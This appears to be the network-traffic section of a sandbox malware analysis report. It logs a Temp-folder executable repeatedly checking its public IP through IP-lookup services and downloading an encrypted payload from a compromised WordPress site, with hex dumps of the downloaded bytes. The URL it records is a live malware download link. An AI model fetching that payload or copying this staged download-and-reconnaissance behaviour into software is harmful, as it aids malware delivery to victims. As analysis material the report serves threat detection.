Jul 25, 2024 10:14:02.308978081 CEST	443	59970	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:02.365128040 CEST	59969	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:02.787369967 CEST	443	59970	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:02.788934946 CEST	59970	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:02.788968086 CEST	443	59970	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:02.934710979 CEST	443	59970	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:02.934798956 CEST	443	59970	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:02.934910059 CEST	59970	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:02.935518980 CEST	59970	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:02.938638926 CEST	59969	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:02.939790964 CEST	59971	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:02.943867922 CEST	80	59969	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:02.943914890 CEST	59969	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:02.944514036 CEST	80	59971	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:02.944570065 CEST	59971	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:02.944669008 CEST	59971	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:02.949423075 CEST	80	59971	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:03.661360025 CEST	80	59971	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:03.664377928 CEST	59972	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:03.664408922 CEST	443	59972	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:03.664504051 CEST	59972	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:03.664736986 CEST	59972	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:03.664747000 CEST	443	59972	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:03.755781889 CEST	59971	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:04.154298067 CEST	443	59972	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:04.159468889 CEST	59972	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:04.159501076 CEST	443	59972	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:04.313735008 CEST	443	59972	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:04.313832045 CEST	443	59972	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:04.313980103 CEST	59972	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:04.314306021 CEST	59972	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:04.323309898 CEST	59971	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:04.324342966 CEST	59973	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:04.330144882 CEST	80	59973	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:04.330162048 CEST	80	59971	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:04.330212116 CEST	59973	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:04.330241919 CEST	59971	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:04.330396891 CEST	59973	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:04.336169004 CEST	80	59973	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:05.038235903 CEST	80	59973	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:05.039714098 CEST	59974	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:05.039750099 CEST	443	59974	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:05.039849043 CEST	59974	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:05.040168047 CEST	59974	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:05.040182114 CEST	443	59974	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:05.083951950 CEST	59973	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:05.533561945 CEST	443	59974	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:05.535368919 CEST	59974	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:05.535383940 CEST	443	59974	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:05.683545113 CEST	443	59974	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:05.683660030 CEST	443	59974	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:05.684092999 CEST	59974	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:05.684298992 CEST	59974	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:05.827066898 CEST	59965	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:05.827195883 CEST	59973	80	192.168.2.5	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 10:13:35.878683090 CEST	53	54946	1.1.1.1	192.168.2.5
Jul 25, 2024 10:13:48.920160055 CEST	53	55314	162.159.36.2	192.168.2.5
Jul 25, 2024 10:13:49.431216002 CEST	53	49426	1.1.1.1	192.168.2.5
Jul 25, 2024 10:13:52.543942928 CEST	56979	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:13:52.871205091 CEST	53	56979	1.1.1.1	192.168.2.5
Jul 25, 2024 10:13:54.140052080 CEST	64878	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:13:54.147295952 CEST	53	64878	1.1.1.1	192.168.2.5
Jul 25, 2024 10:13:55.802051067 CEST	63735	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:13:55.812114000 CEST	53	63735	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 10:13:52.543942928 CEST	192.168.2.5	1.1.1.1	0x5627	Standard query (0)	www.reap.skyestates.com.mt	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:13:54.140052080 CEST	192.168.2.5	1.1.1.1	0x7b6e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:13:55.802051067 CEST	192.168.2.5	1.1.1.1	0xab3b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 10:13:52.871205091 CEST	1.1.1.1	192.168.2.5	0x5627	No error (0)	www.reap.skyestates.com.mt		108.167.181.251	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:13:54.147295952 CEST	1.1.1.1	192.168.2.5	0x7b6e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 10:13:54.147295952 CEST	1.1.1.1	192.168.2.5	0x7b6e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:13:54.147295952 CEST	1.1.1.1	192.168.2.5	0x7b6e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:13:54.147295952 CEST	1.1.1.1	192.168.2.5	0x7b6e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:13:54.147295952 CEST	1.1.1.1	192.168.2.5	0x7b6e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:13:54.147295952 CEST	1.1.1.1	192.168.2.5	0x7b6e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:13:55.812114000 CEST	1.1.1.1	192.168.2.5	0xab3b	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:13:55.812114000 CEST	1.1.1.1	192.168.2.5	0xab3b	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.reap.skyestates.com.mt

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	59960	132.226.247.73	80	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:13:54.159282923 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:13:54.835649014 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:13:54 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 60cf735f54f396a7cd0c9e3b5cdcfafa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:13:54.840125084 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:13:55.047537088 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:13:54 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5f3e0f114f2a650126013299a141f141 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:13:56.445100069 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:13:56.655008078 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:13:56 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1dadef887f7b4681e1fc7004fe5b4df7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	59963	132.226.247.73	80	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:13:57.577697992 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:13:58.249696016 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:13:58 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0fa67b361a497df475fe70f173594dc8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	59965	132.226.247.73	80	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:13:58.870138884 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:13:59.547147989 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:13:59 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 69f5491de750e92390426ab848ad1cf3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	59967	132.226.247.73	80	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:14:00.212385893 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:14:00.907155991 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:14:00 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 032cf138e005ecf7b1a485b5480fa8e9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	59969	132.226.247.73	80	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:14:01.597402096 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:14:02.307203054 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:14:02 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d34022dc71b24b66a27b159e8c2517d5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	59971	132.226.247.73	80	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:14:02.944669008 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:14:03.661360025 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:14:03 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2d3e4413ac01e21b5f21b1d8d0638c4c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	59973	132.226.247.73	80	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:14:04.330396891 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:14:05.038235903 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:14:04 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bfb050b0718ca63d1a5e14dee3565b75 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	59959	108.167.181.251	443	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:13:53 UTC	199	OUT	GET /wp-includes/IoNHObzRr183.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.reap.skyestates.com.mt Cache-Control: no-cache
2024-07-25 08:13:53 UTC	249	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:13:53 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 22 Jul 2024 10:23:47 GMT Accept-Ranges: bytes Content-Length: 133184 Content-Type: application/octet-stream
2024-07-25 08:13:53 UTC	7943	IN	Data Raw: 06 a8 01 bc 32 28 eb 40 61 93 17 cc 78 c2 85 83 2a da 2d bc 55 7b fc bc da 03 bd 49 4a ab 6c a0 77 60 df 4a fc b0 d6 71 b1 e1 a5 b7 03 4a 89 7b 4e 61 1a 76 d7 00 e3 c3 b8 02 93 d3 bf eb 1a 2f 06 ff d7 a6 29 f9 6c a8 a4 fb ba 7d 32 9c c3 f2 bf 99 6b 86 f3 d2 24 f5 10 44 a2 0e 3e 08 53 4c 68 03 d0 5e 7a da 9e a0 62 f1 91 23 40 9d 93 fc 18 7a 82 65 ef 0f 3e 37 9e 2d 2a 7f c7 99 0a 4e 33 a4 c6 1e 81 87 8c 8e e3 80 e0 a1 51 b6 1c 5b ef 4d a9 65 f5 6e 26 c9 f9 01 c4 9f 89 a3 93 2d fd d8 d8 0c ff 0e e9 aa 39 5f 47 b1 cc 8d 1e d1 83 8f a5 68 6c e1 19 d6 68 34 5e ed 30 d8 fd bc 66 2d 2d 91 36 f2 48 02 77 ac f9 b5 51 e6 f6 28 f2 74 f6 19 81 9a 94 4c 59 e3 bb 98 4a 79 f4 0a c4 eb cf c8 90 d5 9f 73 e2 07 06 90 b1 b7 dd ce 8e 55 20 5b 9f b4 66 e2 f6 5d 87 af 00 e7 50 Data Ascii: 2(@ax-U{IJlw`JqJ{Nav/)l}2k$D>SLh^zb#@ze>7-N3Q[Men&-9_Ghlh4^0f--6HwQ(tLYJysU [f]P
2024-07-25 08:13:53 UTC	8000	IN	Data Raw: 15 37 98 07 2a 6c 77 9b 0a 78 3d bb 7c 0e 81 33 94 43 e1 38 e1 ed 9c 97 48 e3 c7 32 a1 11 87 01 47 d4 04 6c e4 f6 87 52 fd 42 83 8e d6 61 84 77 ee 13 0a 36 59 96 04 b6 4d f1 ef c8 61 0d 42 e6 19 d5 46 1f 5e eb 1a d8 fd a7 06 6b 2d 28 7a f3 4b 1d 5b c9 9d d3 22 89 f6 28 f8 7f f1 76 15 9a 96 47 20 09 f8 98 3a f9 f4 1e c4 8f a0 bd 90 d5 95 73 8e 98 10 90 c1 9b f5 6f 8e 75 28 56 96 9c 84 e2 f6 77 e8 0c 00 e5 5a 1e 93 71 86 fe 39 c8 d4 70 f8 0f 45 fe 75 86 bf 5b 9c 1f ab 24 b4 8b 75 71 2c a0 9e 7c e4 55 f4 5f 15 b3 1e cb 5e 3a 56 6e c0 f2 8e fb ae 61 09 bb 98 38 1e 3e 74 e6 d9 3e 3a 47 80 4f 65 0b 06 b3 f7 20 13 69 51 0e 55 e5 84 3f 12 0e 30 9f 3c f1 5d 14 da 2a 09 d4 d8 71 56 89 70 4a a5 b8 b9 75 b4 69 b2 b8 76 bf 1a 50 7c 69 03 40 af 9e 16 ae a8 a6 e5 e9 55 Data Ascii: 7lwx=\|3C8H2GlRBaw6YMaBF^k-(zK["(vG :sou(VwZq9pEu[$uq,\|U_^:Vna8>t>:GOe iQU?0<]qVpJuivP\|i@U
2024-07-25 08:13:53 UTC	8000	IN	Data Raw: 2b 58 69 e7 f2 8e f0 b6 64 1f cc 63 ab 1e 4e 11 4d df 2f 34 28 e7 31 4e 01 06 a6 8c 63 b4 69 55 77 ec f4 82 47 b9 a0 30 ef 44 c2 74 96 aa 45 ab c9 55 46 24 bf 64 6f c3 b8 fc 68 b4 69 7f 35 61 97 a1 22 28 76 a1 15 c5 df 87 b8 d8 b9 ef cc 4c 6f 7e cd 9d 22 d7 c3 64 cd 22 c4 eb 3b 77 69 10 c0 75 6b e6 e6 15 05 d9 c3 7c cf 90 14 d3 e4 f8 07 a8 28 1d 93 94 22 49 3c d8 82 54 f9 4a 01 26 f1 c0 e9 27 49 79 54 7f 57 01 d0 fc ef e2 d4 c1 6e e9 f8 b7 93 c2 de ab 19 8e fa 93 88 81 e1 a3 d4 28 db c2 a8 23 00 16 40 0a 1c 20 74 32 36 0a 4b 75 94 61 4f d0 d4 c4 38 17 5f 1b 34 45 49 be e3 21 ce a0 9e 54 57 e9 0e 57 0b 01 a6 d2 84 ac e0 16 0f 19 86 31 0a 58 5b 97 ef a3 a1 75 8c 9e 69 ee 0e 7e b9 7c a2 13 77 84 ea f6 87 b1 37 fa c6 0a 16 2f 72 5e 63 e2 c7 c1 bb 00 d5 39 43 Data Ascii: +XidcNM/4(1NciUwG0DtEUF$dohi5a"(vLo~"d";wiuk\|("I<TJ&'IyTWn(#@ t26KuaO8_4EI!TWW1X[ui~\|w7/r^c9C
2024-07-25 08:13:53 UTC	8000	IN	Data Raw: 03 24 7e 14 6a 45 d0 0c 1a 39 30 5f 0f 35 45 49 be e2 30 e3 de 0f 8a 52 26 50 ad 1d 0c a6 d2 9f bd f8 16 0f 17 f4 22 0a 73 29 81 c7 df a0 65 86 88 95 ef 00 7b d2 ee 9b de 75 84 ea 88 80 81 3d fe fe 04 17 2f 3f 48 4b a5 c7 b2 ad 17 2b 32 5b f9 e1 de 76 95 f8 74 f3 02 a3 8c f2 57 35 0a 48 69 55 6c c2 2a 77 5b d9 cf 88 04 ba c5 a9 15 ac 77 25 f0 3e 19 10 1a 2a 75 2f 1f 2f 8e 5d 21 81 78 37 12 31 4d e3 09 1b 47 b8 f0 07 46 e6 46 07 85 8f d9 48 08 08 67 0b d7 4a 4d c2 2f df a9 61 a5 8f cc 7e 78 22 7f 1b 5f f9 b5 d0 55 8c a2 24 5b f7 d6 04 5c d0 6c 11 55 66 3b d3 ba 81 ff 83 63 18 3e e2 e7 ae aa f8 8e c3 e0 ea 30 4d 29 68 de df ba 6d 2a 4e ad 59 17 06 50 38 ce a6 5f 4f fe 65 e4 a5 31 03 80 7b a3 24 7d 14 00 ec 1f 7c fe 38 9d 16 d8 ef 71 ed a2 c7 0d ec 2c 25 d3 Data Ascii: $~jE90_5EI0R&P"s)e{u=/?HK+2[vtW5HiUlw[w%>u//]!x71MGFFHgJM/a~x"_U$[\lUf;c>0M)hm*NYP8_Oe1{$}\|8q,%
2024-07-25 08:13:53 UTC	8000	IN	Data Raw: 54 32 c5 d3 0c 47 75 3b 29 00 0a 4b bc ac f2 a3 a2 70 6d 40 c6 ce 67 a0 5a 9b d7 f9 fc 2b 69 7c 7d ff db 1a 6f 20 21 81 50 06 05 a5 c5 c4 b7 5f 73 ca 66 f7 a8 33 01 a8 f6 b5 da 7c 16 00 92 37 6b 00 33 9d 11 df f7 50 c3 eb 2c 0d ec 37 38 c7 86 db 83 02 f6 99 70 5b e0 9b 5c 00 97 5f d0 f9 de 49 7e 43 db 45 c1 3f d9 ee 52 be 6c 41 2b 2c 40 92 e5 e0 a5 a3 0c 45 af a6 7d 62 da 1b 11 1d bd 36 38 49 80 f6 87 33 38 c2 ce 7b 90 e6 53 ad ae ed 7e 03 37 a3 a8 89 12 ec 4c a5 0c e6 64 98 b4 47 08 33 84 62 cd 4b c8 58 a1 14 b7 9b e4 57 91 19 58 ae e1 ab cd c2 4a 94 d9 e2 33 1e d2 68 a9 93 57 c0 45 21 0c 69 b4 bb 4c 06 b3 d7 0e 56 9e 45 57 f0 53 13 49 03 66 0a 65 68 f5 98 cb 36 3f 58 1c 6d b1 97 56 9a 72 53 7f 8c 57 38 20 bf 17 79 fc 75 6f 0a 28 df 5f a4 21 9f 84 7c c3 Data Ascii: T2Gu;)Kpm@gZ+i\|}o !P_sf3\|7k3P,78p[\_I~CE?RlA+,@E}b68I38{S~7LdG3bKXWXJ3hWE!iLVEWSIfeh6?XmVrSW8 yuo(_!\|
2024-07-25 08:13:53 UTC	8000	IN	Data Raw: 53 9c c6 2a 0d d3 b8 b5 71 67 af 93 46 3e 3a a1 d1 88 fc 1a 63 60 32 72 83 16 9e 5c 5c 56 f3 0e 20 2f 69 5d e8 42 4f 6d 0c 1e 5a 4b 7e 7b 3b f0 46 2e 53 3a 68 94 00 5d 9a 78 46 6b ee 07 71 20 b5 0c f0 df be 6f 0e 2e cc 4b a3 36 49 bc 5b d2 4e de ac 09 a5 11 f0 76 f4 52 2f f7 7c 4d 72 3f 68 3a 35 03 b3 c3 c7 2e ca 32 65 1d 41 a1 86 ab 6b 33 33 d5 c5 7e 68 8b ac 16 56 ef ab 17 f9 be 24 53 89 11 8a f9 5d f8 db da c9 8d c6 6d 1d 2b 65 87 cb d2 27 49 ec 31 16 cd 4e fe 88 d2 41 6a 14 35 50 98 4c 82 97 ee 4b b1 c3 28 7e a7 50 32 39 7b 88 21 e3 ba f2 ca 68 c3 2b 01 55 78 2b 5a 71 fb 0a ad c9 aa 9e 37 7e fc 4a 88 84 9b 72 96 bf 78 72 3f fe be f1 d3 52 0e 8a 23 e9 4b 2b db 2f d4 58 27 84 4c 29 82 1a 52 28 9e b7 d5 f7 2a ff 0e 5b 46 b0 b8 25 88 51 0a 2c 29 e6 38 b7 Data Ascii: SqgF>:c`2r\\V /i]BOmZK~{;F.S:h]xFkq o.K6I[NvR/\|Mr?h:5.2eAk33~hV$S]m+e'I1NAj5PLK(~P29{!h+Ux+Zq7~Jrxr?R#K+/X'L)R([F%Q,)8
